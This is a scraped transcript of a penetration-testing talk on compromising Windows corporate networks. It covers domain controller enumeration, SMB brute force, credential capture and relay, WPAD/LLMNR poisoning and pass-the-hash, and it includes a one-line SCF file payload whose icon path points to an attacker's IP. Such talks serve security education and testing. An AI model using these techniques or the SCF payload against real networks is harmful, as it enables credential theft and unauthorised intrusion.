Upload File

pwning corporate networks in a single day by paulino calderon pale

  • Home
  • Internet
  • Pwning corporate networks in a single day by Paulino Calderon Pale
53
PWNING NETWORKS IN A SINGLE DAY

Upload: websec-mexico-sc

Post on 08-Jan-2017

69 views

Category:

Internet


0 download

Report

TRANSCRIPT

Page 1: Pwning corporate networks in a single day by Paulino Calderon Pale

PWNING NETWORKS IN A SINGLE DAY

Page 2: Pwning corporate networks in a single day by Paulino Calderon Pale

#CAT /ETC/ABOUT

PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM

http://www.calderonpale.com/
Page 3: Pwning corporate networks in a single day by Paulino Calderon Pale

THINGS I LEARNED

• 99% OF THE TIME IT WILL BE WINDOWS.• MOST OF THE VULNERABILITIES ARE UNKOWN UNTIL

COMPANIES GET PROFESSIONAL HELP.• NO ONE KNOWS WHAT SOFTWARE IS INSTALLED.• DEFAULT CONFIGURATIONS ARE DANGEROUS.

Page 4: Pwning corporate networks in a single day by Paulino Calderon Pale

SMB3.0 3.02

1.02.0

2.1

Page 5: Pwning corporate networks in a single day by Paulino Calderon Pale
Page 6: Pwning corporate networks in a single day by Paulino Calderon Pale

SMB IS OUR FRIEND

SMB IS THE MOST TARGETED PROTOCOL IN WINDOWS NETWORKS.

WITH SMB:• OBTAIN OS AND ACTIVE DIRECTORY INFORMATION.• STEAL USER NETWORK CREDENTIALS.• ACCESS SHARED FOLDERS.• TEST CREDENTIALS.• EXECUTE COMMANDS OR BINARIES REMOTELY (PSEXEC, WMI,

POWERSHELL…)• A LOF OF VULNERABLE IMPLEMENTATIONS (SERVERS AND CLIENTS)…

Page 7: Pwning corporate networks in a single day by Paulino Calderon Pale

DOMAIN CONTROLLERS

• A LOT OF DOMAIN CONTROLLERS ACCEPT NULL SESSIONS.

• THIS INSECURE CONFIGURATION REVEALS INFORMATION ABOUT USERS AND GROUPS.

• WE CAN USE THIS VULNERABILITY TO TARGET HIGH PRIVILEGED USERS.

Page 8: Pwning corporate networks in a single day by Paulino Calderon Pale

OBTAINING INFORMATION FROM A DOMAIN CONTROLLER

LINUXENUM 0.9 SAVES USERS IN TEXT FILES DIVIVED BY DOMAIN GROUPS. THE OUTPUT CAN BE USED BY NMAP AND METASPLOIT.DOWNLOAD: HTTPS://GITHUB.COM/CLDRN/ENUM4LINUX-0.9

Page 9: Pwning corporate networks in a single day by Paulino Calderon Pale

DOMAIN\USER

Page 10: Pwning corporate networks in a single day by Paulino Calderon Pale

OBTAINING INFORMATION FROM DOMAIN CONTROLLERSPOLENUMOBTAINS PASSWORD POLICY FOR A DOMAIN

DOWNLOAD FROM HTTPS://LABS.PORTCULLIS.CO.UK/TOOLS/POLENUM/

Page 11: Pwning corporate networks in a single day by Paulino Calderon Pale

“QUICKPWN”

• IDENTIFY DCS• EXECUTE ENUM4LINUX 0.9$ENUM4LINUX –A <IP>• EXECUTE POLENUM TO OBTAIN THE PASSWORD AND

ACCOUNT LOCKOUT POLICIES.POLENUM <IP>• LAUNCH BRUTE FORCE ATTACK TO FIND ACCOUNTS WITH

WEAK PASSWORDSMETASPLOIT: AUXILIARY/SCANNER/SMB/SMB_LOGINNMAP: SMB-BRUTE

Page 12: Pwning corporate networks in a single day by Paulino Calderon Pale

SHARED FOLDERS

• ENABLED TO ALLOW PEOPLE TO SHARE FILES OVER THE NETWORK.

• NOT UNCOMMON TO FIND SENSITIVE INFORMATION STORED THERE.

Page 13: Pwning corporate networks in a single day by Paulino Calderon Pale

“QUICKPWN”

• FIND SENSITIVE INFORMATION IN SHARED FOLDERS:• FILE LOCATOR LITE O PRO (WWW.MYTHICSOFT.COM)• SMBMAP

http://www.mythicsoft.com)/
http://www.mythicsoft.com)/
Page 14: Pwning corporate networks in a single day by Paulino Calderon Pale

STEALING USER CREDENTIALS

• THERE ARE SEVERAL TECHNIQUES THAT CAN BE USED TO ABUSE SHARED FOLDERS TO OBTAIN USER CREDENTIALS.

• NO PATCH (VULNERABLE BY DESIGN).

Page 15: Pwning corporate networks in a single day by Paulino Calderon Pale

THE CLASSIC SMB CAPTURE ATTACK

AS EASY AS SETTING UP A SMB SERVER AND WAITING FOR USERS TO SEND US THEIR DOMAIN CREDENTIALS…

Page 16: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 17: Pwning corporate networks in a single day by Paulino Calderon Pale

WHO HAS THE TIME TO WAIT?

Page 18: Pwning corporate networks in a single day by Paulino Calderon Pale

UNC PATHS

\\<MACHINE>\<FOLDER>\<FILE>

Page 19: Pwning corporate networks in a single day by Paulino Calderon Pale

WHERE CAN WE USE UNC PATHS?

• WEB APPLICATIONS/SHAREPOINT/YOUR OWN WEB SERVER• SQL QUERIES• OFFICE DOCUMENTS• LMHOSTS.SAM <- HOST YOUR OWN MALICIOUS HOSTS FILE• LNK FILES• SCF FILES <- EASIER TO CREATE THAN LNK FILES

Page 20: Pwning corporate networks in a single day by Paulino Calderon Pale

“QUICKPWN”

• FIND SHARED FOLDER WITH WRITE PERMISSIONS.• UPLOAD A FILE CONTAING A UNC PATH POINTING TO

YOUR SMB SERVER.• WAIT FOR THE CREDENTIALS…

Page 21: Pwning corporate networks in a single day by Paulino Calderon Pale

SCF FILES

[SHELL]COMMAND=2ICONFILE=\\<IP ADDRESS>\SHARE\PWN.ICO[TASKBAR]COMMAND=TOGGLEDESKTOP

Page 22: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 23: Pwning corporate networks in a single day by Paulino Calderon Pale

SMB RELAY ATTACKS

IF SMB SIGNING IS DISABLED, SMB RELAY ATTACKS ARE POSSIBLE.

99.9% SMB SIGNING IS DISABLED ON WINDOWS WORKSTATIONS. (DEFAULT CONFIGURATION)

Page 24: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 25: Pwning corporate networks in a single day by Paulino Calderon Pale
Page 26: Pwning corporate networks in a single day by Paulino Calderon Pale

“QUICKPWN”

• FIND A SHARED FOLDER WITH WRITE PERMISSIONS.• UPLOAD A FILE WITH A UNC PATH POINTINT TO YOUR OWN

SMB SERVER.• USE SMBRELAYX.PY TO REDIRECT THE CONNECTION TO

YOUR VICTIM AND GAIN ACCESS TO THE MACHINE WHEN A USER WITH ENOUGH PRIVILEGES CONNECTS…

Page 27: Pwning corporate networks in a single day by Paulino Calderon Pale

CAN YOU FORCE USERS TO CONNECT TO US?

• THE PREVIOUS ATTACK TECHNIQUES NEEDED:• USERS CONNECTING TO OUR SMB SERVER• ACCESS TO A SHARED FOLDER WITH WRITE PERMISSIONS

BUT CAN WE USE POISONING ATTACKS TO FORCE USERS TO CONNECT TO US?

Page 28: Pwning corporate networks in a single day by Paulino Calderon Pale

THANK YOU WPAD

• ENABLED BY DEFAULT IN ALL WINDOWS VERSIONS.

• DESIGNED TO AUTO CONFIGURE PROXIES IN NETWORKS.

• INTERNET OPTIONS>LAN SETTINGS>AUTOMATICALLY DETECT SETTINGS

Page 29: Pwning corporate networks in a single day by Paulino Calderon Pale

LLMNR Y NBT-NS

• ENABLED IN MOST WINDOWS MACHINES.• LLMNR (LINK-LOCAL MULTICAST NAME RESOLUTION)

<-STARTING FROM WINDOWS VISTA• NBT-NS (NETBIOS NAME SERVICE)• ALLOWED IN A LOT OF NETWORKS WITH

RESTRICTIVE ACCESS.

Page 30: Pwning corporate networks in a single day by Paulino Calderon Pale

“QUICKPWN”

• DETECT WPAD/LLMNR/NBT-NS REQUESTS ON THE NETWORK

• LAUNCH A SMB SERVER TO CAPTURE USER CREDENTIALS.

• FORCE USERS TO CONNECT TO YOU TROUGH POISONING ATTACKS.

• CAPTURE THE USER CREDENTIALS.

Page 31: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 32: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 33: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 34: Pwning corporate networks in a single day by Paulino Calderon Pale
Page 35: Pwning corporate networks in a single day by Paulino Calderon Pale

PASS THE HASH

• IT HAS BEEN AROUND FOR ALMOST 20 YEARS NOW.• A LOT OF WINDOWS PROTOCOLS REQUIRE THE HASH OF THE PASSWORD

BUT NOT THE ACTUAL PASSWORD TO AUTHENTICATE.• A LOT OF TOOLS AVAILABLE SUPPORT PTH:

• PTH-WINEXE, MIMIKATZ,• METASPLOIT: PSEXEC_COMMAND, PSEXEC

Page 36: Pwning corporate networks in a single day by Paulino Calderon Pale

PTH AGAINST RDP

MICROSOFT INTRODUCED“RESTRICTED ADMIN” MODE, NOW, WE CAN USE PTH AGAINST RDP IN WINDOWS 2012 R2 AND WINDOWS 8.1. (ONLY ADMIN)

Page 37: Pwning corporate networks in a single day by Paulino Calderon Pale

MEET PSEXEC

• USEFUL TO LOCATE SYSTEMS THAT SHARE PASSWORDS.

• RUNS COMMANDS OR BINARIES REMOTELY ON MACHINES.

• IT IS VERY NOISY.

Page 38: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 39: Pwning corporate networks in a single day by Paulino Calderon Pale

WDIGEST

• AUTH SYSTEM THAT REQUIRES THAT WINDOWS STORES A PLAINTEXT VERSION OF THE PASSWORDS IN MEMORY.

• WCE, MIMIKATZ FTW

Page 40: Pwning corporate networks in a single day by Paulino Calderon Pale

CREDMAP – THE CREDENTIAL MAPPER

DEVELOPED BY ROBERTO SALGADO FROM WEBSEC TO QUICKLY TEST CREDENTIALS AGAINST DIFFERENT SERVICES ONLINE

DOWNLOAD: HTTPS://GITHUB.COM/LIGHTOS/CREDMAP

Page 41: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 42: Pwning corporate networks in a single day by Paulino Calderon Pale

WMI

• PSEXEC ALTERNATIVE• DOES NOT START A SERVICE• DOES NOT TOUCH THE DISK• IN KALI: WMIEXEC Y PTH-WMIS

Page 43: Pwning corporate networks in a single day by Paulino Calderon Pale

PENTESTERS LOVE POWERSHELL

POWERSHELL CAN BE USED FROM NETWORK RECONNAISSANCE TO PRIVILEGE ESCALATION.

PROJECTS WORTH MENTIONING:• POWERSPLOIT:

HTTPS://GITHUB.COM/POWERSHELLMAFIA/POWERSPLOIT/• EMPIRE:

HTTP://WWW.POWERSHELLEMPIRE.COM

Page 44: Pwning corporate networks in a single day by Paulino Calderon Pale

SMB1 VS SMB2 VS SMB3

• MOST TOOLS ONLY WORK WITH SMB1. (FOR NOW)• SMB2 REMOVES OS FINGERPRINT INFORMATION PRE AUTH.• SMB3 FINALLY INTRODUCES MESSAGE ENCRYPTION.

Page 45: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 46: Pwning corporate networks in a single day by Paulino Calderon Pale

OTHER “QUICKPWNS”

• GOLDEN TICKET KERBEROS• OUTDATED SOFTWARE• SERVICES WITH EXCESSIVE PERMISSIONS• MISCONFIGURED NETWORK PRINTERS• DEVELOPMENT ENVIRONMENTS WITH INSECURE CONFIGURATIONS• INSECURE UPDATE SYSTEMS (*)

Page 47: Pwning corporate networks in a single day by Paulino Calderon Pale

DEMO

Page 48: Pwning corporate networks in a single day by Paulino Calderon Pale

WHAT OTHER VULNERABILITIES ARE WORTH MENTIONING?

Page 49: Pwning corporate networks in a single day by Paulino Calderon Pale

SPAM

Page 50: Pwning corporate networks in a single day by Paulino Calderon Pale

OWASP RIVIERA MAYA

Page 51: Pwning corporate networks in a single day by Paulino Calderon Pale

NMAP: NETWORK EXPLORATION AND SECURITY AUDITING COOKBOOK 2ND EDITION

Page 52: Pwning corporate networks in a single day by Paulino Calderon Pale

WEBSEC OFFICIAL CHANNELS

• WWW: WWW.WEBSEC.MX• YOUTUBE: YOUTUBE.COM/WEBSECMX• FACEBOOK: WEBSEC.MX• TWITTER: @_WEBSEC

Page 53: Pwning corporate networks in a single day by Paulino Calderon Pale

CONTACT

PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM

http://www.calderonpale.com/

SEC Consult Vulnerability Lab Pwning Symbian V1.05 PUBLIC

2 Calderon Villegas

Portfolio Pablo Calderon

nGenuity Djangocon2010 Pony Pwning

J.L Calderon 1910

Calderon - Presentation.ppt

Ancestors of Paulino ALANIS

Felipe calderon

Library as Publisher: pwning Open Access

Calderon Arquitas

Abusing Exploiting and Pwning with Firefox Addons

Grand Pwning Unit: Accelerating Microarchitectural Attacks

Pwning Pedagogy - Northwest Academic Computing Consortium

Pwning the Enterprise With PowerShell

Software Servers Pwning Your Company's Enterprise An ... · An Unauthenticated Journey to Root : Pwning Your Company's Enterprise Software Servers Pablo Artuso - Yvan Genuer #BHUSA

Paulino fengjain latentfp_matching_descriptorbasedhoughtransform_ijcb11

Pwning ARM Debug Components for Sec-Related Stuff ...conference.hitb.org/hitbsecconf2017ams/materials/D2T4 - Muhama… · Pwning ARM Debug Components for Sec-Related Stu (HardBlare

Calderon Cy

Pony Pwning Djangocon 2010

Pwning Adobe Reader Multiple Times with Malformed Strings - Pwning Adob… · Pwning Adobe Reader Multiple Times with Malformed Strings Ke Liu ( @klotxl404) Tencent Security Xuanwu

Abusing, Exploiting and Pwning with Firefox Add-ons

Pwning Windows Mobile Applications by Ankit Giri

Pwning with powershell

sr - julius calderon

Sonya Calderon Portfolio

Whitehat Hacker & Developer Serial Killer: Silently Pwning ...€¦ · Serial Killer: Silently Pwning Your Java Endpoints Chris;an Schneider Whitehat Hacker & Developer Freelancer

Machine Duping 101: Pwning Deep Learning Systems

Tourism Sustainability - Portugal by Paulino Silva

Serial Killer: Silently Pwning Your Java Endpoints

Pwning Pedagogy - An Ignite Session

Brittany Calderon

Burnett. Calderon

John calderon

O Cooperador Paulino – 110

PRNG : Pwning Random Number Generators - Black Hat | Home